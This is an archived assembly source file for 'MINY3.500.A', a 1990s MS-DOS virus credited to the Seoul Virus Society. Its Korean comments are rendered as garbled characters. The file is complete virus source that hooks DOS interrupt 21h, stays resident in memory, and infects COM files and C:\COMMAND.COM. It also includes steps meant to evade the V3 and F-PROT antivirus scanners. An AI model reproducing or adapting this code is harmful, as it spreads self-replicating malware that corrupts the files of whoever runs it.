home *** CD-ROM | disk | FTP | other *** search

---

/ HPAVC / HPAVC CD-ROM.iso / KOREACOL.ZIP / MINY.ZIP / MINY3.ZIP / MY3-500.ASM

< prev

next >

Wrap

Assembly Source File  |  1996-08-12  |  10KB  |  331 lines

---

1. ;******************************************************************************
2. ;
3. ;         MINY3.500.A Virus
4. ;
5. ;     ╣A╕b: ¼ß╢ë ña╖í£ß»a ╡e╨s          ╣A╕b: 1995æe 02╢⌐ 22╖⌐ -  ╢⌐   ╖⌐
6. ;           Seoul Virus Society
7. ;
8. ;******************************************************************************
9.  
10.  
11.     VIRUS SEGMENT PARA 'VIRUS'
12.           ASSUME  CS:VIRUS, DS:VIRUS
13.  
14.  
15.  Entry:
16.           mov     BP,100h                    ; BP=ña╖í£ß»a »í╕b ║ü¡íêt
17.           NOP
18.           NOP
19.           JMP     ChkVirinMEM                ; £æ ¼w║ü ╠a╦a¥í ╕±╧a
20.           NOP
21.  
22.  NewInt21:       ; ¼ü¥í╢à 21h ñσ ╖Ñ╚ߣ≤╦a
23.           PushF
24.           NOP
25.           cmp     ah,4Bh                      ; »⌐╨ù╖Ñêa?
26.           NOP
27.           jz      C_InfectFile                ; ╠a╖⌐ êq╡q ╤í┬ë
28.  ChkAH:   cmp     ah,3Dh                      ; ╡í╧e ╖Ñêa?
29.           jz      C_InfectFile
30.           cmp     ah,43h                      ; ¡ó¼≈
31.           jz      C_InfectFile
32.           cmp     ah,56h                      ; ╠a╖⌐ ╖íƒq ñaÄüïí
33.           jz      C_InfectFile
34.           cmp     ah,6Ch                      ; 5.0 ╡A¼ß ªü╚ß ┬üêaûE ╡í╧e
35.           jz      C_InfectFile
36.  ChkAHF0:
37.           cmp     AX,0F035h                   ; £æ ¼w║ü ╡aªü ê±¼a╖Ñêa?
38.           jnz     ChkAHF1
39.           PopF
40.           xor     ax,ax                       ; áx╖aíe 0000╖i ò⌐¥a║æ
41.           IRET
42.  ChkAHf1:
43.           cmp     AX,0F135h                  ; C:\COMMAND.COM ╗í╕≈êq╡q
44.           jnz     OrgInt21
45.           mov     dx, offset FstFile         ; C:\COMMAND.COM
46.           Push    CS
47.           Pop     DS
48.           call    InfectFile                 ; ╠a╖⌐ êq╡q
49.           popf
50.           IRET
51.  
52.  C_InfectFile:
53.           NOP
54.           call    InfectFile
55.  OrgInt21:                                   ; ╢Ñ£ü int 21¥í ╕±╧a
56.           NOP
57.           PopF
58.           db      0EAh
59.  OldInt21 dd ?
60.  
61.  C_OldInt21:
62.           NOP
63.           xchg    ah,al
64.           PushF
65.           call    dword ptr CS:[OldInt21]
66.           RET
67.  
68. ;------------------------------------------------------------------
69. ;
70.  InfectFile:
71.           Push    AX                         ; ¥A╗í»a╚ß ╕ß╕w
72.           Push    BX
73.           Push    CX
74.           Push    DX
75.           Push    DS
76.           Push    ES
77.           Push    SI
78.           Push    DI
79.           NOP
80.           cmp     ah,6ch                     ; ¼ü¥í╢à ╡í╧e ñw»ó╖Ñêa?
81.           NOP
82.           jz      Chk_EXTisCOM
83.           mov     si,dx                      ; SI= ╠a╖⌐ »í╕b╢ß├í
84.  
85.  Chk_EXTisCOM:
86.           lodsb                              ; DS:[SI] -> AL
87.           cmp     al,00                      ; ╠a╖⌐ Å{╖Ñêa?
88.           jz      JumpExit
89.           cmp     al,'.'                     ; ╤┬╕w╕a èüÑi?
90.           jnz     Chk_EXTisCOM
91.           lodsw
92.           cmp     ax,'OC'
93.           jnz     JumpExit
94.           lodsb
95.           cmp     al,'M'
96.           jz      SetInt24h
97.  JumpExit:
98.           Jmp     PopRES                     ; COM ╖í ┤aôííe ╣A╢A
99.  
100.  SetInt24h:
101.           mov     bx,ds                      ; Int 24h ƒi └a╗í╨eöa.
102.           xor     ax,ax
103.           mov     ds,ax
104.           Push    DS:[0090h]
105.           Push    DS:[0092h]
106.           mov     word ptr DS:[0090h],offset NewInt24
107.           mov     word ptr DS:[0092h],cs
108.  
109.           mov     ds,bx
110.           mov     ax,0043h                   ; ¡ó¼≈ ┤Φïí
111.           call    C_OldInt21
112.           Push    CX
113.           Push    DX
114.           Push    DS
115.  
116.           MOV     AX,0143h                   ; ╖¬ïí/│aïí ¡ó¼≈╖a¥í ñaÄæ
117.           xor     cx,cx
118.           call    C_OldInt21
119.           jnc     Open_File
120.           JMP     SetOrgAttr
121.  Open_File:
122.           mov     ax,023dh                   ; ╠a╖⌐ ╡í╧e ╨aïí
123.           call    C_OldInt21
124.           jc      SetOrgAttr
125.  
126.           push    cs
127.           pop     ds
128.           Push    cs
129.           pop     es
130.           xchg    bx,ax                      ; ╨àùi ┤Φïí
131.  
132.  Read_File:
133.           mov     ah,3Fh                     ; ╖¬┤ß ùi╖íïí
134.           mov     dx,offset Org4bytes
135.           mov     si,dx
136.           mov     cx,0004h
137.           int     21h
138.  
139.  ChkEXEFile:
140.           mov     AX,word ptr DS:[SI]        ; EXE ╠a╖⌐╖Ñ╗í ê±¼a
141.           cmp     AX,'ZM'                    ; 'MZ'
142.           jz      Close_File
143.  
144.  ChkFSize:
145.           cmp     byte ptr DS:[SI+3],35h     ; êq╡q ╡aªü ╤┬╖Ñ
146.           jz      Close_File
147.  
148.           mov     di,offset V3_Str           ; V3 ╖Ñ╗í ê±¼a
149.           mov     cx,0004
150.           repz    cmpsb
151.           jz      Close_file
152.  
153.           mov     al,02h                     ; ╠a╖⌐╖ü ╣A╖⌐ ûߥí
154.           call    AH42h
155.  
156.           cmp     ax,1234                    ; 1234 Ñíöa ╕b╖eêa?
157.           jb      Close_File
158.           cmp     ax,64000                   ; 64000 Ñíöa ╟eêa?
159.           ja      Close_File
160.  
161.           Push    AX
162.           add     AX,0100h
163.           mov     word ptr DS:[Entry+1],ax   ; ña╖í£ß»a »í╕b╢ß├í
164.           Pop     AX
165.           sub     ax,0003                    ; JMP íw¥w ╣í╕b
166.           mov     word ptr ds:[FileHead+1],ax
167.           mov     byte ptr ds:[FileHead+3],35h
168.  
169.           mov     ax,5700h                   ; Éi╝a/»íêe ┤Φïí
170.           Int     21h
171.           Push    CX
172.           Push    DX
173.  
174.           mov     al,40h                     ; ña╖í£ß»a │aïí
175.           xor     dx,dx
176.           mov     cx, offset End_Virus
177.           call    C_OldInt21
178.  
179.           mov     al,00h                     ; ╠a╖⌐╖ü └ß╖q╖a¥í ╖íò╖
180.           call    AH42h
181.  
182.           mov     al,40h                     ; ña╖í£ß»a │aïí
183.           mov     dx, offset FileHead
184.           mov     cx,0004h
185.           call    C_OldInt21
186.  
187.           Pop     dx                         ; ╢Ñ£ü Éi╝a¥í ñaÄüïí
188.           Pop     CX
189.           mov     ax,5701h
190.           Int     21h
191.  
192.  Close_File:                                 ; ╠a╖⌐ öhïí
193.           mov     ah,3eh
194.           Int     21h
195.  
196.  SetOrgAttr:
197.           Pop     DS                         ; ╢Ñ£ü ¡ó¼≈╖a¥í ñaÄüïí
198.           Pop     DX
199.           pop     CX
200.           mov     ax,0143h
201.           Call    C_OldInt21
202.  
203.           xor     ax,ax                      ; Int 24h Ñóèü
204.           mov     ds,ax
205.           POP     DS:[0092h]
206.           POP     DS:[0090h]
207.  
208.  PopRES:
209.           Pop     DI                         ; ╢Ñ£ü ¥A╗í»a╚ß Ñóèü
210.           Pop     si
211.           Pop     ES
212.           Pop     ds
213.           Pop     dx
214.           Pop     cx
215.           Pop     bx
216.           Pop     ax
217.           RET
218.  
219. ;-------------------------------------------------------------------
220. ;    £æ ¼w║ü ªüªà
221. ;    òí»a╖ü ┬A¼w╢ß╡A ¼w║ü╨eöa.
222.  
223.  ChkVirinMEM:
224.           xor     si,si                      ; F-PROT ╖ü ╗Ñöe ïíôw╖i
225.  A_F:     nop                                ; óü¥b╤┴»í╟Ñöa.
226.           inc     si
227.           cmp     si,1234h
228.           jnz     A_F
229.  
230.           mov     ax,35F0h                   ; AX=F035h/Int 21h»í
231.           xchg    ah,al                      ;
232.           Int     21h                        ;
233.           or      ax,ax                      ;
234.           jz      Already_MEM                ; £æ╡A ╣Ñ╕ü╨aôeêa?
235.  
236.           xor     bx,bx                      ; BX=0000
237.           mov     ds,bx                      ; 0000:0084h Ñó¼a
238.           mov     si,0083h
239.           NOP
240.           lea     DI,SS:[BP+OldInt21]
241.           Inc     SI
242.           NOP
243.           cld
244.           movsw                              ; 0000:0084 ->
245.  
246.           Push    cs
247.           Pop     AX
248.           movsw                              ; 0000:0086 ->
249.           Push    cs
250.           Pop     ds
251.  
252.           mov     CX,(offset Tend_virus - SEGORG +15 ) SHR 4 ;└a╗í╨i £æ ╟aïí
253.           dec     ax
254.           mov     ds,ax                      ; MCB (Memory Control Block)
255.           Inc     BL                         ; BX=0001
256.           NOP
257.           cmp     byte ptr DS:[BX-1],'Z'     ; áa╗íáb ºi£Γ╖Ñêa?
258.           jnz     Already_MEM
259.           NOP
260.           sub     word ptr DS:[BX+02],CX     ; áa╗íáb ¡Aïaáσ╦a ëü¼e
261.           NOP
262.           sub     word ptr DS:[BX+11h],CX    ; òí»aêa ¼a╢w╨i ╢w£╖ ║ë╖▒
263.           NOP
264.           mov     ES,word ptr DS:[BX+11h]    ;
265.           NOP
266.           Push    cs                         ; CS=DS
267.           Pop     ds
268.  
269.           mov     si,BP                      ; ña╖í£ß»a Ñó¼a
270.           NOP
271.           xor     di,di                      ; IP=0000 ªü╚ß ╣Ñ╕ü╨eöa.
272.           mov     cx, offset TEnd_Virus      ; ña╖í£ß»a ï⌐╖í
273.           repz    movsb                      ; Ñó¼a
274.  
275.           mov     ds,cx                      ; CX=0000
276.           cli                                ;
277.           mov     word ptr ds:[BX+85h],es    ; BX=0001
278.           mov     word ptr ds:[BX+83h],offset NewInt21
279.           sti
280.  
281.           mov     ah,30h                     ; òí»a ñß╕σ┤Φïí
282.           Int     21h
283.           cmp     al,05
284.           ja      Already_Mem                ; òí»a 6.0 ╖í¼w╖ííe ╣A╢A
285.  
286.           Mov     ax,35F1h                   ; C:\COMMAND.COM êq╡q»í╟íïí
287.           xchg    ah,al
288.           Int     21h
289.  Already_Mem:
290.           mov     si,BP                      ; SI ôe ña╖í£ß»a »í╕b╢ß├í
291.  
292.           push    cs                         ; cs=ds
293.           pop     ds
294.           push    cs                         ; ds=es
295.           pop     es
296.  
297.  Re_COM:          ; COM ╠a╖⌐ »⌐╨ù╨aïí
298.           add     si,offset Org4bytes        ; ╢Ñ£ü òA╖í╚ß╖ü êt èü╨aïí
299.           mov     di,00FFh
300.           Inc     di                         ; └ß╖q╖ü 4 ña╖í╦a Ñóèü
301.           push    di
302.           movsw
303.           movsw
304.           xor     ax,ax
305.           RET                                ; »a╚é╡A 100h êa ╕ß╕w
306.  
307.  Org4bytes        db 90h,90h,0cdh,20h         ; ╢Ñ£ü 4 ña╖í╦a╖ü êt
308.  
309.  Ah42h:   xor     dx,dx
310.           xor     cx,cx
311.           mov     ah,42h
312.           Int     21h
313.           RET
314.  
315.  NewInt24:        ; ╡A£ßêa Éa╗í ┤gëA╨eöa.
316.           XOR     AL,AL
317.           IRET
318.  
319.           db      '[Miny3]'                  ; ña╖í£ß»a ╖íƒq
320.  FstFile  db      'C:\command.COM',00        ; C:\COMMAND.COM
321.  V3_Str   db      0EBh,13h,73h,43h           ; V3 ╠a╖⌐ ╕a₧a
322.  FileHead db      0E9h
323.  
324.  End_VIRUS:
325.           db      ?,?,?
326.  TEnd_VIRUS:
327.  
328.  
329.    Virus  EndS
330.     End  Entry
331.